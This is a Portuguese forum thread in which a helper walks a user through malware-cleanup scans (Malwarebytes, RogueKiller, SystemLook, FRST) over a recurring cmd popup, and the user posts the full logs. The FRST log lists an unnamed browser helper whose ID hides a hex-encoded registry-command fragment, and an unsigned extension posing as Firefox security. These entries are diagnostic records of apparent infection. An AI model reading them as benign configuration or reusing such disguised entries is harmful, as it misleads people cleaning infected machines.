    www.malwarebytes.com

    -Detalhes de registro-
    Data da análise: 18/09/17
    Hora da análise: 23:15
    Arquivo de registro: 5899b20e-9ce0-11e7-a0a5-40167eab023a.json
    Administrador: Sim

    -Informação do software-
    Versão: 3.2.2.2029
    Versão de componentes: 1.0.188
    Versão do pacote de definições: 1.0.2837
    Licença: Versão de Avaliação

    -Informação do sistema-
    Sistema operacional: Windows 7 Service Pack 1
    CPU: x64
    Sistema de arquivos: NTFS
    Usuário: LUCAS-PC\A

    -Resumo da análise-
    Tipo de análise: Análise Customizada
    Resultado: Concluído
    Objetos verificados: 463741
    Ameaças detectadas: 0
    (Nenhum item malicioso detectado)
    Ameaças em quarentena: 0
    (Nenhum item malicioso detectado)
    Tempo decorrido: 23 min, 54 seg

    -Opções da análise-
    Memória: Habilitado
    Inicialização: Habilitado
    Sistema de arquivos: Habilitado
    Arquivos compactados: Habilitado
    Rootkits: Habilitado
    Heurística: Habilitado
    PUP: Detectar
    PUM: Detectar

    -Detalhes da análise-
    Processo: 0
    (Nenhum item malicioso detectado)

    Módulo: 0
    (Nenhum item malicioso detectado)

    Chave de registro: 0
    (Nenhum item malicioso detectado)

    Valor de registro: 0
    (Nenhum item malicioso detectado)

    Dados de registro: 0
    (Nenhum item malicioso detectado)

    Fluxo de dados: 0
    (Nenhum item malicioso detectado)

    Pasta: 0
    (Nenhum item malicioso detectado)

    Arquivo: 0
    (Nenhum item malicioso detectado)

    Setor físico: 0
    (Nenhum item malicioso detectado)


    (end)

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites

    @Murilo Beraldo

     

    Faça o download do RogueKiller by Tigzy, e salve na sua área de trabalho (Desktop).
    roguekiller.exe (x64) << link

    • Feche todos os programas
    • Execute o RogueKiller.exe.
      ** Usuários do Windows Vista, Windows 7, 8, 8.1 e Windows 10:
      Clique com o direito sobre o arquivo rogueKiller.exe, depois clique em VRIfczU.png.
    • Quando a janela da Eula aparecer, clique em Accept.
    • Selecione a aba SCAN
    • Clique em START SCAN
    • Aguarde ate que o scan termine...
    • Clique no botão OPEN REPORT
    • Clique na opção EXPORT TXT e salve na Área de Trabalho com o nome de roguekiller.txt
    • Clique em OK e feche o RogueKiller.



    Atente para abrir o arquivo, copiar e colar todo o conteúdo na sua próxima resposta

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
  • Autor do tópico
  • Aqui vai. E obrigado por estar ajudando :D

     

    RogueKiller V12.11.16.0 (x64) [Sep 18 2017] (Free) por Adlice Software
    mail : http://www.adlice.com/contact/
    Feedback : https://forum.adlice.com
    Site : http://www.adlice.com/download/roguekiller/
    Blog : http://www.adlice.com

    Sistema Operacional : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
    Iniciou : Modo normal
    Usuário : A [Administrador]
    Started from : C:\Users\A\Desktop\RogueKiller_portable64.exe
    Modo : Escanear -- Data : 09/19/2017 19:19:55 (Duration : 00:12:58)

    ¤¤¤ Processos : 0 ¤¤¤

    ¤¤¤ Registro : 6 ¤¤¤
    [PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1444981709-1690395092-1683229413-1000\Software\Microsoft\Internet Explorer\Main | Start Page : about:Tabs  -> Encontrado
    [PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1444981709-1690395092-1683229413-1000\Software\Microsoft\Internet Explorer\Main | Start Page : about:Tabs  -> Encontrado
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 201.6.2.93 201.6.2.119 ([-][Brazil])  -> Encontrado
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{DB90E8CF-DB50-4933-BA80-4CDA1B2D5A0D} | DhcpNameServer : 201.6.2.93 201.6.2.119 ([-][Brazil])  -> Encontrado
    [PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1444981709-1690395092-1683229413-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Encontrado
    [PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1444981709-1690395092-1683229413-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Encontrado

    ¤¤¤ Tarefas : 2 ¤¤¤
    [Suspicious.Path] \CIS_{15198508-521A-4D69-8E5B-B94A6CCFF805} -- C:\Users\A\AppData\Local\Temp\cis3929.exe (--PostUninstall {15198508-521A-4D69-8E5B-B94A6CCFF805}) -> Encontrado
    [Hj.Shortcut] \{BE9DAE43-E2E7-4DEF-8298-8EC212500AE6} -- "c:\program files (x86)\google\chrome\application\chrome.exe" (http://ui.skype.com/ui/0/7.18.0.112/pt/abandoninstall?page=tsMain) -> Encontrado

    ¤¤¤ Arquivos : 4 ¤¤¤
    [PUP.Gen1][Arquivo] C:\Users\A\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Popcorn Time.lnk [LNK@] C:\PROGRA~2\POPCOR~1\POPCOR~1.EXE -> Encontrado
    [Hidden.ADS][Stream] C:\ProgramData:961CD860F779A42E -> Encontrado
    [PUP.Gen1][Pasta] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Popcorn Time -> Encontrado
    [PUP.Gen1][Pasta] C:\Program Files (x86)\Popcorn Time -> Encontrado

    ¤¤¤ WMI : 0 ¤¤¤

    ¤¤¤ Arquivos de hosts : 0 [Too big!] ¤¤¤

    ¤¤¤ Antirootkit : 0 (Driver: Carregado) ¤¤¤

    ¤¤¤ Navegadores : 2 ¤¤¤
    [PUM.SearchEngine][Firefox:Config] j167jror.default : user_pref("browser.search.defaultenginename", "Google (avast)"); -> Encontrado
    [PUM.HomePage][Chrome:Config] Default [SecurePrefs] : session.startup_urls [http://www.hotmail.com/] -> Encontrado

    ¤¤¤ Verificação da MBR : ¤¤¤
    +++++ PhysicalDrive0: KINGSTON SV300S37A120G SCSI Disk Device +++++
    --- User ---
    [MBR] 7c11b1c00944ee3ae35c4ba780ff4434
    [BSP] 3ae37d265e3c199ca0c260edf3277be5 : Windows Vista/7/8|VT.Unknown MBR Code
    Partition table:
    0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114370 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    User = LL1 ... OK
    User = LL2 ... OK

    +++++ PhysicalDrive1: WDC WD10EZEX-00BN5A0 SCSI Disk Device +++++
    --- User ---
    [MBR] 4a237e8e4f7e182b30e2c2cbbde01ca1
    [BSP] a932aeb9624341c5ca86f20fc7f7f8cc : Windows Vista/7/8|VT.Unknown MBR Code
    Partition table:
    0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    User = LL1 ... OK
    User = LL2 ... OK

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
  • Autor do tópico
  • então, eu fiz isso, na verdade executei mais vezes tambem, pois ele continuava detectando algumas mudanças no registro (duas na verdade). Hoje chegando em casa eu vou usar o computador de novo  e verificarei se o problema aparece. Aí retorno aqui com a resposta.

     

    Obrigado :D

    Editado por Murilo Beraldo

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
  • Autor do tópico
  • Parece que ainda continua aparecendo o cmd com o erro :z

     

    Eu estou terminando uma varredura com o RogueKiller para identificar os itens que disse antes, já posto aqui.

     

    O Mbam detectou nada.

    cmd.png

    adicionado 4 minutos depois

    EDIT: Aqui vai

    Parece que sempre que reinicio o computador e faço uma varredura ele acha estes mesmos 3

     

    RogueKiller V12.11.16.0 (x64) [Sep 18 2017] (Free) por Adlice Software
    mail : http://www.adlice.com/contact/
    Feedback : https://forum.adlice.com
    Site : http://www.adlice.com/download/roguekiller/
    Blog : http://www.adlice.com

    Sistema Operacional : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
    Iniciou : Modo normal
    Usuário : A [Administrador]
    Started from : C:\Users\A\Desktop\RogueKiller_portable64.exe
    Modo : Escanear -- Data : 09/20/2017 19:45:45 (Duration : 00:13:10)

    ¤¤¤ Processos : 0 ¤¤¤

    ¤¤¤ Registro : 2 ¤¤¤
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 201.6.2.93 201.6.2.119 ([-][Brazil])  -> Encontrado
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{DB90E8CF-DB50-4933-BA80-4CDA1B2D5A0D} | DhcpNameServer : 201.6.2.93 201.6.2.119 ([-][Brazil])  -> Encontrado

    ¤¤¤ Tarefas : 0 ¤¤¤

    ¤¤¤ Arquivos : 1 ¤¤¤
    [Hidden.ADS][Stream] C:\ProgramData:961CD860F779A42E -> Encontrado

    ¤¤¤ WMI : 0 ¤¤¤

    ¤¤¤ Arquivos de hosts : 0 [Too big!] ¤¤¤

    ¤¤¤ Antirootkit : 0 (Driver: Carregado) ¤¤¤

    ¤¤¤ Navegadores : 0 ¤¤¤

    ¤¤¤ Verificação da MBR : ¤¤¤
    +++++ PhysicalDrive0: KINGSTON SV300S37A120G SCSI Disk Device +++++
    --- User ---
    [MBR] 7c11b1c00944ee3ae35c4ba780ff4434
    [BSP] 3ae37d265e3c199ca0c260edf3277be5 : Windows Vista/7/8|VT.Unknown MBR Code
    Partition table:
    0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114370 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    User = LL1 ... OK
    User = LL2 ... OK

    +++++ PhysicalDrive1: WDC WD10EZEX-00BN5A0 SCSI Disk Device +++++
    --- User ---
    [MBR] 4a237e8e4f7e182b30e2c2cbbde01ca1
    [BSP] a932aeb9624341c5ca86f20fc7f7f8cc : Windows Vista/7/8|VT.Unknown MBR Code
    Partition table:
    0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    User = LL1 ... OK
    User = LL2 ... OK

    Editado por Murilo Beraldo

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites

    @Murilo Beraldo

     

    Nenhuma das entradas encontradas pelo roguekiller são problemas. Pode ficar tranquilo.

     

    Siga os procedimentos do link abaixo para mostrar as pastas ocultas.
    Windows xp/7/vista: http://windows.microsoft.com/pt-br/windows/show-hidden-files#show-hidden-files=windows-7
    Windows 8/8.1/10: http://www.tecmundo.com.br/como-fazer/26558-windows-8-como-exibir-arquivos-e-extensoes-ocultos.htm

    Agora faça o download do SystemLook.exe e salve no seu desktop.
    http://jpshortstuff.247fixes.com/SystemLook_x64.exe

    *** Usuários do Windows Vista, Windows 7, 8/8.1 ou Windows 10 Clique com o direito sobre o arquivo SystemLook.exe, depois clique em VRIfczU.png.

    Clique duas vezes no SystemLook.exe. Selecione, copie e cole o que está dentro do CODE na caixa de texto da ferramenta.

    :filefind
    Control.cpl
    control.cpl
    :folderfind
    FE-1.0.0.0
    :regfind
    Control.cpl
    control.cpl

    Clique no botão Look e ao fim do exame um log se abrirá. Ele é salvo como SystemLook.txt no desktop.

    Selecione, copie e cole o conteúdo deste log na sua próxima resposta.

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
  • Autor do tópico
  • Só de sacanagem o negocio me aparece bem quando acabou o scan x-x

    Coloquei pra mostrar os arquivos ocultos e extensoes tambem. coloquei pra mostrar os arquivos ocultos do windows tb.

     

    Aqui o log

     

    SystemLook 30.07.11 by jpshortstuff
    Log created at 19:48 on 21/09/2017 by A
    Administrator - Elevation successful

    ========== filefind ==========

    Searching for "Control.cpl"
    No files found.

    Searching for "control.cpl"
    No files found.

    ========== folderfind ==========

    Searching for "FE-1.0.0.0"
    No folders found.

    ========== regfind ==========

    Searching for "Control.cpl"
    No data found.

    Searching for "control.cpl"
    No data found.

    -= EOF =-control.thumb.jpg.9d0b3f2a7af73727652e5103684b0940.jpg

    Editado por Murilo Beraldo

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites

    @Murilo Beraldo

     

    Baixe o Farbar Recovery Scan do link abaixo e salve na sua área de trabalho.
    https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/

    ** Usuários do Windows Vista, Windows 7, 8/8.1 e windows 10:
    Clique com o direito sobre o arquivo FRST64.EXE, depois clique em VRIfczU.png .
    Aceite o contrato e depois clique no botão Scan.

    Aguarde e ao final, os logs FRST.txt e Addition.txt serão salvos no seu desktop.

    Selecione, copie e cole o conteúdo do FRST.txt em sua próxima resposta e anexe o Addition.txt

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
  • Autor do tópico
  • FRST.txt

     

    Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão: 20-09-2017
    Executado por A (administrador) em LUCAS-PC (22-09-2017 19:03:06)
    Executando a partir de C:\Users\A\Desktop
    Perfis Carregados: A (Perfis Disponíveis: A)
    Platform: Windows 7 Professional Service Pack 1 (X64) Idioma: Português (Brasil)
    Internet Explorer Versão 11 (Navegador padrão: Chrome)
    Modo da Inicialização: Normal
    Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processos (Whitelisted) =================

    (Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)

    (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
    (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
    (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\APRP\aprp.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
    (Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrotray.exe
    (Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe
    (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
    (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
    (BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
    (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
    (Scarlet.Crush Productions) E:\Arquivos de Programas\Scarlet.Crush Productions\bin\ScpService.exe
    (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
    (Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
    (Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
    (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
    (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
    (PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
    (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
    (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    (Microsoft Corporation) C:\Windows\System32\msiexec.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
    (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
    (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
    (Wacom Technology) C:\Program Files\Tablet\Pen\WacomHost.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_Tablet.exe
    (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
    (Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Akamai Technologies, Inc.) C:\Users\A\AppData\Local\Akamai\netsession_win.exe
    (Akamai Technologies, Inc.) C:\Users\A\AppData\Local\Akamai\netsession_win.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe

    ==================== Registro (Whitelisted) ===========================

    (Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13530184 2013-04-22] (Realtek Semiconductor)
    HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-04-11] (Intel Corporation)
    HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1278024 2013-03-08] (Realtek Semiconductor)
    HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
    HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2014-02-21] (Intel Corporation)
    HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrotray.exe [1871344 2017-08-10] (Adobe Systems Inc.)
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Run: [Akamai NetSession Interface] => C:\Users\A\AppData\Local\Akamai\netsession_win.exe [4673432 2014-10-29] (Akamai Technologies, Inc.)
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8722136 2016-06-01] (Piriform Ltd)
    Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll

    ==================== Internet (Whitelisted) ====================

    (Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)

    Hosts: Há mais de uma entrada no Hosts. Veja a seção Hosts do Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 201.6.2.93 201.6.2.119
    Tcpip\..\Interfaces\{61404789-C97D-4202-8464-A9A596FC93CD}: [NameServer] 8.8.8.8
    Tcpip\..\Interfaces\{DB90E8CF-DB50-4933-BA80-4CDA1B2D5A0D}: [DhcpNameServer] 201.6.2.93 201.6.2.119

    Internet Explorer:
    ==================
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    SearchScopes: HKU\S-1-5-21-1444981709-1690395092-1683229413-1000 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
    BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    BHO-x32: Sem Nome -> {6F83220D-2200-1287-2249-17574CA92DB0}22202F76204E6F4578706C6F726572202F74205245475F44574F5244202F642031202F66 -> Nenhum Arquivo
    BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-26] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-01-28] (Oracle Corporation)
    BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-01-28] (Oracle Corporation)
    BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    Toolbar: HKLM - avast! WebRep - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  Nenhum Arquivo
    Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    Handler: gopher - {79eac9e4-baf9-11ce-8c82-00aa004ba90b} -  Nenhum Arquivo

    FireFox:
    ========
    FF ProfilePath: C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default [2017-09-19]
    FF Homepage: Mozilla\Firefox\Profiles\j167jror.default -> about:home
    FF SearchPlugin: C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default\searchplugins\google-avast.xml [2014-12-05]
    FF HKLM-x32\...\Firefox\Extensions: [amizade@technet.com] - C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default\Mozilla.xpi
    FF Extension: (Mozilla Firefox Security) - C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default\Mozilla.xpi [2014-12-04] [não assinado]
    FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension.15@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn
    FF Extension: (Adobe Acrobat DC - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn [2017-04-27]
    FF HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Firefox\Extensions: [{87F8774F-B485-47E2-A755-A40A8A5E886D}] - C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\cef\xpi => não encontrado (a)
    FF HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Firefox\Extensions: [{87F8774F-B485-47E2-A755-A40A8A5E8874}] - C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\abn\xpi => não encontrado (a)
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\buscape.xml [2015-05-07]
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\mercadolivre.xml [2015-05-07]
    FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_27_0_0_130.dll [2017-09-14] ()
    FF Plugin: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll [2014-07-04] (Microsoft Corporation)
    FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
    FF Plugin: @wacom.com/wtPlugin,version=2.1.0.3 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-12-25] (Wacom)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2017-03-27] (Adobe Systems)
    FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_130.dll [2017-09-14] ()
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.0.72 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-03-12] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-03-12] (Intel Corporation)
    FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [2015-01-28] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2015-01-28] (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll [2014-07-04] (Microsoft Corporation)
    FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
    FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-05-18] (NVIDIA Corporation)
    FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-05-18] (NVIDIA Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
    FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.3 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2012-12-25] (Wacom)
    FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2017-08-10] (Adobe Systems Inc.)
